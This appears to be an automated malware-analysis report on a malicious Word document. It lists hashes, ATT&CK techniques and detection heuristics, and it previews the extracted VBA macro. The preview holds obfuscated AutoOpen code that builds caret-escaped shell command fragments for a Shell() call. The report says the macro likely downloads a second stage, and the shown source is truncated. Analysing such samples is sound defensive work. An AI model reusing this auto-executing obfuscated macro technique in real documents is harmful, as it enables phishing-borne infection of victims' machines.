Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 284cbbbe13010bb1…

MALICIOUS

Office (OLE)

Size: 221.6 KB
Created: 2018-09-25 08:10:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 7dba3334c3eafb12307c2d05b8e4d47c
SHA-1: f0cfb6a6c7d5cad98ea438402659b2682d558fc4
SHA-256: 284cbbbe13010bb147869f494ff2fd39833d1ca4e24c679f4fadbbcc05a9b7bd
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute external code. The macro's obfuscated nature and truncated script prevent a definitive analysis of its exact payload, but the presence of the Shell() call strongly suggests it is designed to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Malware.00536d-6697202-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6697202-0
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 204463 bytes
SHA-256: 740abfb00984db3a04c9cb091f128936e007322555e2318a3bd329686488db6c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DVlSjIhmjR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim EDSkYR(2)
EDSkYR(0) = Mid(wMQErZS + QiOWoICtsJiTNFZ + SRvLjTa, 519, 446) + MidB(iZBvD + QuKiiYRlizrmAqziDpVi + dhilLnP, 680, 786)
EDSkYR(1) = MidB(RkmXc + wdjdLOrwVaauDArEjZq + zrIPG, 234, 213) + Left(nlDwAVQ + ruIOOojljYiHGfTGbEj + zGZZE, 9)
   Dim mZwnzi(2)
mZwnzi(0) = Mid(aZaiB + fIaUBJSHjIPHWPckwiHH + ruAfJfwH, 522, 895) + Mid(fTiUdqE + UpLzoTwzXAAXRQwEJI + wwFrGbF, 323, 74) + Left(WEpiULh + XRdIIOCszjLowjbLUs + StoKcids, 549) + Mid(EhUzi + sYEBRhbjlkWqlQOUDad + EOlIj, 573, 729)
mZwnzi(1) = Right(vzisQc + AzrIGHoMJiOnJwzDvi + zqCum, 646) + Mid(mOkaiXzz + UTUDffkZvSYKlERDMiGkOw + Xklzz, 920, 510) + Mid(lwLWwBI + NEzVkfhurNjFGfcnwScj + IvFjQdw, 73, 735) + MidB(ECzGPFBj + fpjuVAUikUcrbNdNOfTX + YAhiNb, 7, 428)
   Dim FZmuci(1)
FZmuci(0) = MidB(wbcKYWn + VmMMRwzAnzwIGwiCa + kKqZIwN, 544, 202) + Right(EijYQn + zcqWjpWDZskjBCWsnYk + EbEoVhi, 811)
   Dim ZjvYM(2)
ZjvYM(0) = Left(HcsdV + HKDYmJvtcZOCGJfViwXDKO + IXBiz, 964) + MidB(bAVAaGf + zzHvzwrzzvjHJzmWc + QmjhiBm, 906, 451) + Left(kKQVOK + qzAUqTGqaTJZhUOPRT + ZiOWi, 883) + MidB(cvwDaPS + XqvUDIMliAzuINapczYQDp + dUwSCY, 37, 882)
ZjvYM(1) = Left(kWWSJ + nlhmjfocNQziLuSsnQw + OkbKETKn, 536) + Mid(EKbtCS + KluCSGczRIuoXwqV + DcXUc, 501, 28)
   Dim pUmZP(1)
pUmZP(0) = Mid(iJEtrK + LbtVDvztPHJqfJJaco + vhCQhQ, 809, 349) + Right(EJAjf + cXsJIwzTYkhktiDoAffjDzN + Zpzdvw, 998)
daOPpjYMKN (KeyString(JtnJjBa + RKCPu + 0 + 8 + 3 + 12 + 44 + uvqsME + FkSAVq) + ICaIO + mwaUL + KeyString(puoLov + YFjVEw + 0 + 10 + 4 + 14 + 49 + nLPztMU + hlDtm) + nFrtGwiw + PQkuJFJimN + zLzYGZcjTnq + PTEBoi + otPDnl + prBfhEbiiaX + daQQncdWi + jcfivOb + iBTmmvbwUpu + LbAGmDqNEqZ + bzsZTFhI + YctdB + wGaPmq + ussiV + JCiXiWKi + IPbqNG + ifDwScjR + HPbCsw + miFQN + kIMZF)
   Dim qNwzqp(2)
qNwzqp(0) = Left(vfadZGmn + oGLFvOowNFqsQmhwC + trnZqk, 363) + Left(USLRhXlR + CrzpEnGITFproOSWYhVz + YhBStBP, 277)
qNwzqp(1) = Mid(itCimj + fsfbWUCSvLskFfFFJ + paTRjT, 345, 686) + MidB(ZLTWEzKw + jUCYqqJzjizuNHFXBk + XYVYN, 1, 663)
   Dim LYiVY(2)
LYiVY(0) = MidB(pJUjDKc + TAqFbFAIfzVRwlYlVih + fhrQB, 158, 258) + Mid(Ruzsq + TiMtvENXMSlqlUdZuFp + RDRAB, 950, 538) + MidB(XCvUmRaJ + ppbGJpIfQkIdkMmXLakXsS + QhMwkcz, 173, 199) + MidB(ILtSNiJP + IKZolSESjnRzBRzjjbC + iMSHXsiC, 364, 408)
LYiVY(1) = MidB(nKzJiE + JqDBUNKjskiJZzKh + lwnia, 283, 128) + Right(BXKflo + nLfYTaDzIBZKUFYsQSu + KNqNu, 882) + MidB(QiWVuc + CfcGFajAtZNwsOYOFjX + OjIbz, 10, 443) + MidB(UNmRq + BJMBUjZkiHVOMXYrYSjj + wGbfLb, 474, 451)
   Dim ZKGji(1)
ZKGji(0) = Left(rTtBPuf + swcQRafYZzsiwiHO + pJRjrP, 128) + MidB(Mwwviau + wzaLJJtRLDjmQCpKkaLGK + BvcTI, 63, 396) + Left(XqiAIn + vRAafizjkiMnrPUzqzCz + AqIYoC, 932) + Right(KtqmVM + XSqJcjaKzphAsJisoHwih + jWiKnk, 220)
End Sub


Attribute VB_Name = "hVGXKiOkCGT"
Function nFrtGwiw()
YpcNHAH = "d" + " " + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "V" + "^:" + "O" + "N" + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "C"
jMHAEAnI = CStr(Chr(1 + 4 + 3 + 0 + 26)) + "^s" + "^" + "e^" + "t"
ZhsaYpjwD = " #" + "^" + "~=" + "^" + "3" + "^5" + "^" + "1^" + " " + "9^"
ifckNmw = "0" + "5^" + " ^" + "30" + "^9"
Dim ozrtQG(2)
ozrtQG(0) = MidB(poAADEii + VGpzsKrHCnFTrRmzolzK + RjjINE, 276, 610) + Left(LArHh + wUIjVIRbciLtWYaaKpt + ZAiFll, 967)
ozrtQG(1) = MidB(TApSova + mbfTZmPmjGrdFVVadfq + ZaWGwk, 591, 998) + MidB(HXtFavqz + LvpuTiaAULvwOPIpiCGdi + pEvimfXN, 107, 573)
   Dim SsVjDh(2)
SsVjDh(0) = MidB(ZWtqH + UNizmiiMdpwEDzqRrHEP + fEojf, 23, 740) + Left(tNMRHGf + ROHqCaSZqSpQzInGdmcCAZJl + jKMjO, 973)
SsVjDh(1) = Right(pCNQG + dpdQDdAduCoMHQsWPfGGBw + RajNjbG, 445) + Left(VoZjhbo + wuYKZklRWjcRFCFhWNGk + Smwjz, 598)
   Dim mNGEzt(1)
mNGEzt(0) = Left(aiLaj + kPERLVtZfVijXQPnVc + GkrmYLtU, 968) + Mid(nzBMZf + jZiLGnVuLsNiIRTKwhjKW + klIEq, 167, 70)
LWfmG = "^ " + "^0" + "^9" + "3" + " " + "5" + "3" + "
... (truncated)